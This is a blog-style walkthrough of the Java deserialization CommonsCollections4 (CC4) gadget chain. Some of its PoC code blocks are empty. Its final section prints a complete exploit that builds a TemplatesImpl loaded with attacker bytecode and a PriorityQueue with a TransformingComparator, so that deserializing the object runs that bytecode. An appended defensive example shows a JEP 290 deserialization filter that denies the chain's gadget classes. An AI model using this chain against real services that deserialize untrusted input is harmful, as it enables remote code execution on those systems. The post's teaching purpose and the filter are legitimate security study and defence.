0x00 Preface
If you are reading this, you are presumably already familiar with the Java deserialization CC chains. This post does not study the CC4 chain from the "how to find it" angle; it focuses on the big picture and on the debugging approach.
0x01 Overview
Background
The CC4 chain uses the commons-collections4 library; load it first:
```xml
<dependency>
    <groupId>org.apache.commons</groupId>
    <artifactId>commons-collections4</artifactId>
    <version>4.0</version>
</dependency>
```
In versions of commons-collections4 after 4.0, InvokerTransformer no longer implements the Serializable interface, so this post still relies on static code (TemplatesImpl loading a class whose static block runs the dangerous call) to execute the payload, and the class used to invoke it is InstantiateTransformer.
Approach
The CC chains all revolve around the transform method.
The bottom of the CC4 chain still ends in ChainedTransformer.transform; all that is needed is to search upward from there for a path to readObject.
0x02 PoC
First, the PoC for the bottom of the chain:

Next, the top of the chain:

Now a first attempt at the complete PoC:

This PoC does not work. If you have been building the PoC layer by layer, it is not hard to see that the problem lies in the PriorityQueue class, so set a breakpoint in the heapify method called from readObject and debug to find the cause.
It turns out that when heapify is called, the member field size is 0, and (0 >>> 1) - 1 == -1, so the loop that would call the comparator never runs. Let us set size to 2 and see.
Since the field value has to be changed, it can be done either the ordinary way or via reflection. Calling add with the malicious comparator already in place would pop calc during construction, so the transformer is swapped in via reflection after the adds. The final PoC:
```java
package cc4;

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.collections4.Transformer;
import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.ChainedTransformer;
import org.apache.commons.collections4.functors.ConstantTransformer;
import org.apache.commons.collections4.functors.InstantiateTransformer;

import javax.xml.transform.Templates;
import java.lang.reflect.Field;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.PriorityQueue;

import static Tool.Serialize.serialize;
import static Tool.Unserialize.unserialize;

public class Main {
    public static void main(String[] args) throws Exception {
        // TemplatesImpl: fields are private, so they are populated via reflection
        TemplatesImpl templates = new TemplatesImpl();
        Class templatesClass = templates.getClass();
        Field nameField = templatesClass.getDeclaredField("_name");
        nameField.setAccessible(true);
        nameField.set(templates, "example_name");
        Field bytecodesField = templatesClass.getDeclaredField("_bytecodes");
        bytecodesField.setAccessible(true);
        byte[] code = Files.readAllBytes(Paths.get("E://all_test/test_java/com/Unserialize/cc_test/target/classes/Tool/Calc.class"));
        byte[][] codes = {code};
        bytecodesField.set(templates, codes);
        Field tfactoryField = templatesClass.getDeclaredField("_tfactory");
        tfactoryField.setAccessible(true);
        tfactoryField.set(templates, new TransformerFactoryImpl());

        // Bottom of the chain: ConstantTransformer -> InstantiateTransformer(TrAXFilter)
        InstantiateTransformer instantiateTransformer =
                new InstantiateTransformer(new Class[]{Templates.class}, new Object[]{templates});
        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(TrAXFilter.class),
                instantiateTransformer
        };
        ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
        // Empty chain used only while the queue is being filled
        ChainedTransformer chainedTransformer1 = new ChainedTransformer(new Transformer[]{});

        // Top of the chain: PriorityQueue.readObject -> heapify -> TransformingComparator.compare
        TransformingComparator transformingComparator = new TransformingComparator(chainedTransformer1);
        PriorityQueue<Object> priorityQueue = new PriorityQueue<>(transformingComparator);
        // Two adds so that size becomes 2 and heapify actually calls the comparator
        priorityQueue.add(1);
        priorityQueue.add(2);
        // Swap in the real transformer only after the adds, via reflection
        Class transformersClass = transformingComparator.getClass();
        Field transformerField = transformersClass.getDeclaredField("transformer");
        transformerField.setAccessible(true);
        transformerField.set(transformingComparator, chainedTransformer);

        serialize(priorityQueue);
        unserialize("ser.bin");
    }
}
```
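The defensive counterpart to the chain above, as an added example that is not part of the original post: the chain only works because readObject on PriorityQueue runs heapify, and therefore the comparator, before application code ever sees the object. A JEP 290 ObjectInputFilter (java.io.ObjectInputFilter, assumed Java 9 or later) decides on class names as each class descriptor is read, so the rejection happens before heapify runs. The rejected class names are the ones the chain relies on (PriorityQueue, commons-collections4 functors and comparators, the xalan TemplatesImpl/TrAXFilter package); the allowlisted types and the `maxdepth` value are assumptions standing in for whatever an application legitimately exchanges.

```java
package cc4;

import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InvalidClassException;
import java.io.ObjectInputFilter;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.util.ArrayList;
import java.util.PriorityQueue;

public class DeserializationGuard {

    // Allowlist first, then explicit rejects for the gadget classes of this chain,
    // then "!*" so that anything not named is rejected. The first matching pattern wins.
    // java.lang.* and java.util.ArrayList are assumed application types (placeholders).
    static final ObjectInputFilter FILTER = ObjectInputFilter.Config.createFilter(
            "java.lang.*;"
          + "java.util.ArrayList;"
          + "!java.util.PriorityQueue;"
          + "!org.apache.commons.collections4.**;"
          + "!com.sun.org.apache.xalan.**;"
          + "maxdepth=16;"
          + "!*");

    // Deserialize with the filter installed on this stream only.
    public static Object readChecked(byte[] data) throws IOException, ClassNotFoundException {
        try (ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(data))) {
            ois.setObjectInputFilter(FILTER);
            return ois.readObject();
        }
    }

    static byte[] toBytes(Object o) throws IOException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(bos)) {
            oos.writeObject(o);
        }
        return bos.toByteArray();
    }

    public static void main(String[] args) throws Exception {
        // Constructed sample: an allowlisted type passes through unchanged.
        ArrayList<Integer> ok = new ArrayList<>();
        ok.add(1);
        System.out.println("ArrayList accepted: " + readChecked(toBytes(ok)));

        // Constructed sample: even a harmless PriorityQueue (default comparator) is rejected,
        // because the filter runs on the class descriptor before PriorityQueue.readObject,
        // and therefore before heapify and any comparator, gets a chance to execute.
        PriorityQueue<Integer> pq = new PriorityQueue<>();
        pq.add(1);
        try {
            readChecked(toBytes(pq));
        } catch (InvalidClassException e) {
            System.out.println("PriorityQueue rejected: " + e.getMessage());
        }
    }
}
```

The rejection patterns are listed for illustration; the part that actually closes the hole is the trailing `!*`, which turns the filter into an allowlist. If an application does need to deserialize PriorityQueue, the filter cannot inspect the comparator's transformer, so the commons-collections4 and xalan rejects are what keep this particular chain from completing. The same filter can be applied process-wide with the `jdk.serialFilter` system property instead of per stream.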
0x03 Conclusion
Reviewing the old is how one learns the new.